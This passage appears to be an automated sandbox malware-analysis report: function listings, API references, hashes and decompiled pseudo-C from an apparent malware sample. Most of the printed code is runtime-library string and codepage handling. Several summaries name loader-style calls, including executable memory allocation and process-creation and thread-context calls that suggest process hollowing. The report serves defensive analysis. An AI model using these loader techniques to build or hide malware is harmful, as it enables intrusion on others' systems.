Opcode Fuzzy Hash: 7f112a53103efb0d1130b80e122edadfff3b355a72e37d03c438b452bd6af500
Instruction Fuzzy Hash: 71F082729013286AF720AB459D4AFDB776CDF05744F00007ABB08E5192DB349A40C7ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040B93B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B94E
_itow.MSVCRT ref: 0040B95C

Part of subcall function 0040B8C2: memset.MSVCRT ref: 0040B8E7
Part of subcall function 0040B8C2: GetPrivateProfileStringW.KERNEL32 ref: 0040B90F

Strings

X1E, xrefs: 0040B93B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$PrivateProfileString_itow
String ID: X1E
API String ID: 1482724422-1560614071
Opcode ID: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
Instruction ID: c527bd8864a1e8dc9924cbacd4c6e7ae812da0d58d0774c54ed9ac8dc2116314
Opcode Fuzzy Hash: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
Instruction Fuzzy Hash: EDE0BFB294021CB6EF11BFA1CC46F9D77ACBB14748F004025FA05A51D1E7B8E6598759

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE89, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D

wcsrchr.MSVCRT ref: 0040BE92
wcscat.MSVCRT ref: 0040BEA8

Strings

_lng.ini, xrefs: 0040BEA2

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 85d76508d49b0ff6757e45e150b40472edf209ff8ddcdf29665fd620b319a214
Instruction ID: 84d8fe8025816c60ed5f34aa0efad718bb16e503e766276e22ad5a10aaf03d01
Opcode Fuzzy Hash: 85d76508d49b0ff6757e45e150b40472edf209ff8ddcdf29665fd620b319a214
Instruction Fuzzy Hash: EDC01262586A20A4F622B622AE03B8A02888F52308F25006FFD00341C2EFAC561180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0042B269, Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042B30B
memcpy.MSVCRT ref: 0042B344
memset.MSVCRT ref: 0042B35A
memcpy.MSVCRT ref: 0042B393

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
Instruction ID: 5583aac8f3c8c6829f169dedbb5c7f3bc80267d871db847419cec400d03eb5c0
Opcode Fuzzy Hash: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
Instruction Fuzzy Hash: A551B375A00215EBDF14DF55D882BAEBB75FF04340F54805AED04A6252E7789E50CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C05B, Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 004087CA: memset.MSVCRT ref: 004087D8

??2@YAPAXI@Z.MSVCRT ref: 0040C088
??2@YAPAXI@Z.MSVCRT ref: 0040C0AF
??2@YAPAXI@Z.MSVCRT ref: 0040C0D0
??2@YAPAXI@Z.MSVCRT ref: 0040C0F1

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
Instruction ID: 98264c0c01cbe32efcdb0ac77575e239005db210b2699cda7c9871cbaaee01ad
Opcode Fuzzy Hash: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
Instruction Fuzzy Hash: 4B21B5B0A11700CFD7518F6A8485A16FAE8FF95310B26C9AFD159DB6B2D7B8C440CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC5, Relevance: 5.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00408DD7

Part of subcall function 004080AC: malloc.MSVCRT ref: 004080C8
Part of subcall function 004080AC: memcpy.MSVCRT ref: 004080E0
Part of subcall function 004080AC: free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9

free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
memcpy.MSVCRT ref: 00408E44

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 39603b6d7359158d33076ec7bab952e59b6d37e46f731a650a7499c7d7739eb1
Instruction ID: da9404a03362d95f45f68813529404a67aab342ff110b4c830d245a8fa10e0ef
Opcode Fuzzy Hash: 39603b6d7359158d33076ec7bab952e59b6d37e46f731a650a7499c7d7739eb1
Instruction Fuzzy Hash: 7B214F71100604EFD730DF18D98199AB3F5FF853247118A2EF8A69B6E1CB39A915CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00416CFF, Relevance: 5.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,0041767E,?,?,0041767E,00417A93,00000000,?,00417D00,?,00000000), ref: 00416D1A
malloc.MSVCRT ref: 00416D22
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D39
free.MSVCRT(00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D40

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: b607c71614b1ca8bec50a9c51f152560627b91c66ff5640af174e5643dcff5fd
Instruction ID: b9117e17fd0dd3e97e5004a4b09ed95055046f94a1a1b3665f6ad504cf0e37ce
Opcode Fuzzy Hash: b607c71614b1ca8bec50a9c51f152560627b91c66ff5640af174e5643dcff5fd
Instruction Fuzzy Hash: DAF0377620521E7BE6102565AC40E77779CEB86276B21072BBD10E65D1ED59EC0046B4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: xjyxibeifbdmock.exe PID: 6828 Parent PID: 3440 xjyxibeifbdmock.exeCOMMON

Executed Functions

Function 001518A3, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001518A3() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E001518AF); // executed
				return _t1;
			}

0x001518a8
0x001518ae

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_000018AF,0015123F), ref: 001518A8

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1af4f069af83d963028096b47e0540d7e21d2169c705859ede2e964f95695898
Instruction ID: cb194a6947ae25c131a0da52e8449ad7fddc744ed25507c990c0816a3e709a32
Opcode Fuzzy Hash: 1af4f069af83d963028096b47e0540d7e21d2169c705859ede2e964f95695898
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0016D2E5, Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 212librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,CallWindowProcW,00003000,LoadLibraryW), ref: 0016D443
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 0016D483
LoadLibraryW.KERNELBASE(00000004,00003000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 0016D4A5

Strings

CallWindowProcW, xrefs: 0016D43B, 0016D43E
LoadLibraryW, xrefs: 0016D42B, 0016D42E
VirtualAlloc, xrefs: 0016D45F, 0016D462
VirtualFree, xrefs: 0016D44F, 0016D452

Memory Dump Source

Source File: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AllocVirtual
String ID: CallWindowProcW$LoadLibraryW$VirtualAlloc$VirtualFree
API String ID: 2458631311-840194956
Opcode ID: 68b6c466073c91d79cb371cc8d60e45755da7240ae76d72352d3ace4da18c246
Instruction ID: 58e67de85a1856c92fc019efbcbed966b392c2b79c685a21999cc71e37d9f06a
Opcode Fuzzy Hash: 68b6c466073c91d79cb371cc8d60e45755da7240ae76d72352d3ace4da18c246
Instruction Fuzzy Hash: 96A15B30D082C8DAEB11CBE8D8487EDBFB2AF25708F144199E1857F382D7BA5554CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0015A5E6, Relevance: 12.2, APIs: 8, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0015A5E6(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* __esp;
				signed int _t49;
				signed int _t54;
				void* _t55;
				int _t58;
				signed int _t61;
				short* _t63;
				signed int _t67;
				short* _t69;
				short* _t71;
				void* _t79;
				short* _t82;
				short* _t83;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t98;
				int _t100;
				int _t102;
				short* _t103;
				int _t107;
				int _t109;
				signed int _t110;
				short* _t111;
				void* _t114;

				_pop(_t110);
				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x16dc28; // 0x375adbf1
				 *(_t110 - 4) = _t49 ^ _t110;
				_push(__esi);
				_push(__edi);
				_t107 =  *(_t110 + 0x18);
				if(_t107 > 0) {
					_t79 = E0015CE86( *(_t110 + 0x14), _t107);
					_t114 = _t79 - _t107;
					_t4 = _t79 + 1; // 0x1
					_t107 = _t4;
					if(_t114 >= 0) {
						_t107 = _t79;
					}
				}
				_t100 =  *(_t110 + 0x24);
				if(_t100 == 0) {
					_t100 =  *( *((intOrPtr*)( *((intOrPtr*)(_t110 + 8)))) + 8);
					 *(_t110 + 0x24) = _t100;
				}
				_t54 = MultiByteToWideChar(_t100, 1 + (0 |  *((intOrPtr*)(_t110 + 0x28)) != 0x00000000) * 8,  *(_t110 + 0x14), _t107, 0, 0);
				 *(_t110 - 8) = _t54;
				if(_t54 == 0) {
					L38:
					_t55 = E00151B61( *(_t110 - 4) ^ _t110);
					_push(_t110);
					return _t55;
				} else {
					_t97 = _t54 + _t54;
					_t87 = _t97 + 8;
					asm("sbb eax, eax");
					if((_t97 + 0x00000008 & _t54) == 0) {
						_t82 = 0;
						__eflags = 0;
						L14:
						if(_t82 == 0) {
							L36:
							_t109 = 0;
							L37:
							E00158AE5(_t82);
							_push(_t109);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t100, 1,  *(_t110 + 0x14), _t107, _t82,  *(_t110 - 8));
						_t125 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t102 =  *(_t110 - 8);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(_t102);
						_push(_t82);
						_push( *(_t110 + 0x10));
						_push( *((intOrPtr*)(_t110 + 0xc)));
						_t61 = E0015568B(_t87, _t107, _t125); // executed
						_t109 = _t61;
						if(_t109 == 0) {
							goto L36;
						}
						if(( *(_t110 + 0x10) & 0x00000400) == 0) {
							_t98 = _t109 + _t109;
							_t89 = _t98 + 8;
							__eflags = _t98 - _t89;
							asm("sbb eax, eax");
							__eflags = _t89 & _t61;
							if((_t89 & _t61) == 0) {
								_t103 = 0;
								__eflags = 0;
								L30:
								__eflags = _t103;
								if(__eflags == 0) {
									L35:
									E00158AE5(_t103);
									goto L36;
								}
								_push(0);
								_push(0);
								_push(0);
								_push(_t109);
								_push(_t103);
								_push( *(_t110 - 8));
								_push(_t82);
								_push( *(_t110 + 0x10));
								_push( *((intOrPtr*)(_t110 + 0xc)));
								_t63 = E0015568B(_t89, _t109, __eflags);
								__eflags = _t63;
								if(_t63 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags =  *(_t110 + 0x20);
								if( *(_t110 + 0x20) != 0) {
									_push( *(_t110 + 0x20));
									_push( *((intOrPtr*)(_t110 + 0x1c)));
								} else {
									_push(0);
									_push(0);
								}
								_push(WideCharToMultiByte( *(_t110 + 0x24), 0, _t103, _t109, ??, ??, ??, ??));
								_pop(_t109);
								__eflags = _t109;
								if(_t109 != 0) {
									E00158AE5(_t103);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t92 = _t98 + 8;
							__eflags = _t98 - _t92;
							asm("sbb eax, eax");
							_t67 = _t61 & _t92;
							_t89 = _t98 + 8;
							__eflags = _t67 - 0x400;
							if(_t67 > 0x400) {
								__eflags = _t98 - _t89;
								asm("sbb eax, eax");
								_t69 = E00154CDB(_t89, _t102, _t67 & _t89);
								_pop(_t89);
								_t103 = _t69;
								__eflags = _t103;
								if(_t103 == 0) {
									goto L35;
								}
								 *_t103 = 0xdddd;
								L28:
								_t103 =  &(_t103[4]);
								goto L30;
							}
							__eflags = _t98 - _t89;
							asm("sbb eax, eax");
							E0015F1E0();
							_t103 = _t111;
							__eflags = _t103;
							if(_t103 == 0) {
								goto L35;
							}
							 *_t103 = 0xcccc;
							goto L28;
						}
						_t71 =  *(_t110 + 0x20);
						if(_t71 == 0) {
							goto L37;
						}
						_t129 = _t109 - _t71;
						if(_t109 > _t71) {
							goto L36;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(_t71);
						_push( *((intOrPtr*)(_t110 + 0x1c)));
						_push(_t102);
						_push(_t82);
						_push( *(_t110 + 0x10));
						_push( *((intOrPtr*)(_t110 + 0xc)));
						_t109 = E0015568B(0, _t109, _t129);
						if(_t109 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t73 = _t54 & _t97 + 0x00000008;
					_t87 = _t97 + 8;
					if((_t54 & _t97 + 0x00000008) > 0x400) {
						__eflags = _t97 - _t87;
						asm("sbb eax, eax");
						_t82 = E00154CDB(_t87, _t100, _t73 & _t87);
						_pop(_t87);
						__eflags = _t82;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t82 = 0xdddd;
						L12:
						_t82 =  &(_t82[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E0015F1E0();
					_t83 = _t111;
					_t82 = _t83;
					if(_t82 == 0) {
						goto L36;
					}
					 *_t82 = 0xcccc;
					goto L12;
				}
			}

0x0015a5ea
0x0015a5eb
0x0015a5ec
0x0015a5ed
0x0015a5f4
0x0015a5f8
0x0015a5fc
0x0015a5fd
0x0015a5ff
0x0015a605
0x0015a60b
0x0015a60e
0x0015a60e
0x0015a611
0x0015a614
0x0015a614
0x0015a611
0x0015a615
0x0015a61a
0x0015a621
0x0015a624
0x0015a624
0x0015a640
0x0015a646
0x0015a64b
0x0015a7de
0x0015a7e9
0x0015a7ee
0x0015a7f1
0x0015a651
0x0015a651
0x0015a654
0x0015a659
0x0015a65d
0x0015a6b1
0x0015a6b1
0x0015a6b3
0x0015a6b5
0x0015a7d3
0x0015a7d3
0x0015a7d5
0x0015a7d6
0x0015a7dc
0x00000000
0x0015a7dd
0x0015a6c6
0x0015a6cc
0x0015a6ce
0x00000000
0x00000000
0x0015a6d4
0x0015a6d9
0x0015a6da
0x0015a6db
0x0015a6dc
0x0015a6dd
0x0015a6de
0x0015a6df
0x0015a6e0
0x0015a6e3
0x0015a6e6
0x0015a6eb
0x0015a6ef
0x00000000
0x00000000
0x0015a6fc
0x0015a736
0x0015a739
0x0015a73c
0x0015a73e
0x0015a740
0x0015a742
0x0015a78e
0x0015a78e
0x0015a790
0x0015a790
0x0015a792
0x0015a7cc
0x0015a7cd
0x00000000
0x0015a7d2
0x0015a794
0x0015a796
0x0015a798
0x0015a79a
0x0015a79b
0x0015a79c
0x0015a79f
0x0015a7a0
0x0015a7a3
0x0015a7a6
0x0015a7ab
0x0015a7ad
0x00000000
0x00000000
0x0015a7b1
0x0015a7b2
0x0015a7b3
0x0015a7b6
0x0015a7f2
0x0015a7f5
0x0015a7b8
0x0015a7b8
0x0015a7b9
0x0015a7b9
0x0015a7c6
0x0015a7c7
0x0015a7c8
0x0015a7ca
0x0015a7fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0015a7ca
0x0015a744
0x0015a747
0x0015a749
0x0015a74b
0x0015a74d
0x0015a750
0x0015a755
0x0015a770
0x0015a772
0x0015a777
0x0015a77e
0x0015a77f
0x0015a77f
0x0015a781
0x00000000
0x00000000
0x0015a783
0x0015a789
0x0015a789
0x00000000
0x0015a789
0x0015a757
0x0015a759
0x0015a75d
0x0015a762
0x0015a764
0x0015a766
0x00000000
0x00000000
0x0015a768
0x00000000
0x0015a768
0x0015a6fe
0x0015a703
0x00000000
0x00000000
0x0015a709
0x0015a70b
0x00000000
0x00000000
0x0015a713
0x0015a714
0x0015a715
0x0015a716
0x0015a717
0x0015a71a
0x0015a71b
0x0015a71c
0x0015a71f
0x0015a727
0x0015a72b
0x00000000
0x00000000
0x00000000
0x0015a731
0x0015a664
0x0015a666
0x0015a668
0x0015a670
0x0015a68f
0x0015a691
0x0015a69b
0x0015a69d
0x0015a69e
0x0015a6a0
0x00000000
0x00000000
0x0015a6a6
0x0015a6ac
0x0015a6ac
0x00000000
0x0015a6ac
0x0015a674
0x0015a678
0x0015a67e
0x0015a67f
0x0015a681
0x00000000
0x00000000
0x0015a687
0x00000000
0x0015a687

APIs

MultiByteToWideChar.KERNEL32(?,375ADBF1,00000008,?,00000000,00000000,?,00000000,?,?,?,?,0015A837,00000001,00000001,00000000), ref: 0015A640
__alloca_probe_16.LIBCMT ref: 0015A678
MultiByteToWideChar.KERNEL32(?,00000001,00000008,?,?,00000000,?,?,?,0015A837,00000001,00000001,00000000,?,?,?), ref: 0015A6C6
__alloca_probe_16.LIBCMT ref: 0015A75D
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000007,00000010,00000000,00000000,?,00000400,?,00000000,00000000,00000000,00000000,00000000), ref: 0015A7C0
__freea.LIBCMT ref: 0015A7CD

Part of subcall function 00154CDB: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00158A6C,00000000,?,?,00154ED7,?,00000008,?,001560E1,?,?), ref: 00154D0D

__freea.LIBCMT ref: 0015A7D6
__freea.LIBCMT ref: 0015A7FB

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 8b0da4dec364e0db69d3039e7991e0375c426c4ca1f82c062d10d95b22c6fc6e
Instruction ID: 186e924ae1fbe380ef0e37d5cdc86de4589d1a31e45312a892ab188e3c54e67d
Opcode Fuzzy Hash: 8b0da4dec364e0db69d3039e7991e0375c426c4ca1f82c062d10d95b22c6fc6e
Instruction Fuzzy Hash: 4E510472640206EFEB258E74CC85EBB7BB9EF44752B554729FC24DA040EB31DC8896A1

Uniqueness

Uniqueness Score: -1.00%

Function 0016BEC5, Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0016BF96
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 0016C1CE

Memory Dump Source

Source File: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 8bec369c02fb80119eb6691f58760d01be9b0a197ec7183664f247fb6680f4dc
Instruction ID: 60871b52a5b887c6f9bc11ad541919fe2a1be9997dffff123a39f50e762ce93e
Opcode Fuzzy Hash: 8bec369c02fb80119eb6691f58760d01be9b0a197ec7183664f247fb6680f4dc
Instruction Fuzzy Hash: 61A11674E00209EBDB14CFA4CC98BEEB7B5BF48304F208199E555BB281C7759A91CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0016A215, Relevance: 7.9, APIs: 5, Instructions: 416processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0016A36B
GetThreadContext.KERNELBASE(?,00010007), ref: 0016A38C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0016A3AE

Memory Dump Source

Source File: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: 563d617a1cd43068d3f84ad9b9b26e65aa92e03903d3bd141c1abf00cef13507
Instruction ID: b5c259a658e0c085723d49b585b95c91acf6fb812749f51d9f4d55e97df5c6be
Opcode Fuzzy Hash: 563d617a1cd43068d3f84ad9b9b26e65aa92e03903d3bd141c1abf00cef13507
Instruction Fuzzy Hash: CB023671A00208EBDB18CFA8CD95BEEB7B5FF48300F648158E615BB281DB74AA51CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0015568B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

LCMapStringEx.KERNELBASE ref: 001556DE
LCMapStringW.KERNEL32(00000000,00000000,00000000,?,00000000,00000008,?,00000007,?,?,?,?,00000000,00000001,?,000000FF), ref: 001556FC

Strings

LCMapStringEx, xrefs: 0015569C, 001556A6

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 86ac2d0c1c390408586c64dad0844fcbbbd4e8281b3fb73668c03decb278a40d
Instruction ID: db891c19c4c24bff52a7758dd1aab8402ebd9875a089809e36b41c2f36a35c1b
Opcode Fuzzy Hash: 86ac2d0c1c390408586c64dad0844fcbbbd4e8281b3fb73668c03decb278a40d
Instruction Fuzzy Hash: B0011332600208FBCF125F90DC22DEE3F62EF18761F054008FE1829160CB728971EB80

Uniqueness

Uniqueness Score: -1.00%

Function 001580BE, Relevance: 3.2, APIs: 2, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E001580BE(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x16dc28; // 0x375adbf1
				_v8 = _t48 ^ _t99;
				_push(_a4);
				_t98 = _a8;
				_t78 = E00157C8F(__ebx, __eflags);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_push(0);
					_pop(_t81);
					_t51 = 0;
					_v32 = _t81;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x16de08)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x16de08)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x16ec34 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												_push(_t98);
												E00157D02();
												goto L37;
											}
										} else {
											E00151E90(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00157C51( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											_push(_t98); // executed
											E00157D67(_t78, _t91, _t95, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00151E90(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x16de18;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x16de04; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00157C51(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x16de0c;
					_t95 = 6;
					do {
